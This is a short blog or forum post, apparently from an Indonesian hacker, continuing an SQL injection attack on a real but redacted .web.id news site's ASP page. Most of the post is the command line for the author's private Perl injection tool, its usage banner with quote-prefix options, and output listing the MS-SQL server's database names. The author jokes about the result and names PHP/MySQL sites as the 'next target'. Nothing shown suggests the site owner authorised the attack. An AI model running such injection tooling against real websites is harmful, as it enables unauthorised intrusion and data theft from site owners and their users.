Continuation: SQL Injection PenTest against MS-SQL Server
Having learned the names of the tables and their columns, we can, just for fun, also take a look at the database names:
E:\data\sqlperl\baru>sqli_loop_multi.pl -t "http://www.XXXXX.web.id/notice_news_
content.asp?id=" -p 2
*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!
by iko94(iko94@yahoo.com)
www.geocities.com/iko94
use : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "target_path" -p pilihan
contoh : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "http://www.XXXXX.web.id/not
ice_news_content.asp?id=" -p 2
ket :
-t target_path
-p pilihan
pilihan :
0 ==> tidak ada quote di depan injek
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek
*********************************
http://www.XXXXX.web.id/notice_news_content.asp?id=
[+] hasil : 1|master
[+] hasil : 2|tempdb
[+] hasil : 3|model
[+] hasil : 4|msdb
[+] hasil : 5|pubs
[+] hasil : 6|Northwind
[+] hasil : 7|o2jam
gak match lagi
dah selesai
++++++++++++++
dah selesai at E:\data\sqlperl\baru\sqli_loop_multi.pl line 147.
E:\data\sqlperl\baru>
Xixixixixixi, wow, how kind of MS-SQL Server to tell us what all its database names are...
Kendi... these scripts are almost at final release (but still PRIVATE)...
NEXT TARGET: PHP scripts with a MySQL database backend...
[+] THX To GOD, for everything...
[EOF]